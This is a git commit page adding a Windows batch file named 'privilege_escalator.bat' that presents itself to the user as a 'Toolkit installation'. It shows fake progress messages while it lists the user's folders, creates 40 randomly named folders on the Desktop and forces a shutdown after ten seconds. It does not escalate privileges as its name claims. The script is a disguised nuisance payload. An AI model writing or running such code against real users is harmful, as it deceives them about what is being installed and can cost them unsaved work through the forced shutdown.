diff options
author | rafa_99 <raroma09@gmail.com> | 2021-09-23 16:40:24 +0100 |
---|---|---|
committer | rafa_99 <raroma09@gmail.com> | 2021-09-23 16:40:24 +0100 |
commit | 6c2e76026c0fe6211c171c36d5b5aff523b989b1 (patch) | |
tree | 9749a52a77ae910c7e949e83e498fbee8fb9b5e3 /Privilege Escalator/privilege_escalator.bat | |
parent | b29bf8c1c7b03f86926b0d876caf31a111eefe22 (diff) |
Diffstat (limited to 'Privilege Escalator/privilege_escalator.bat')
-rw-r--r-- | Privilege Escalator/privilege_escalator.bat | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/Privilege Escalator/privilege_escalator.bat b/Privilege Escalator/privilege_escalator.bat new file mode 100644 index 0000000..fa02a12 --- /dev/null +++ b/Privilege Escalator/privilege_escalator.bat @@ -0,0 +1,15 @@ +@echo off
+title Toolkit installation
+msg * Toolkit installation is starting
+cd /d %systemdrive%\Users\%username%\
+@echo on
+tree
+@echo off
+cd /d %systemdrive%\Users\%username%\Desktop
+setlocal EnableDelayedExpansion
+ for /l %%x in (1,1,40) do (
+ mkdir !random!
+ )
+endlocal
+msg * The toolkit installation is nearly complete please wait ...
+shutdown /s /t 10
\ No newline at end of file |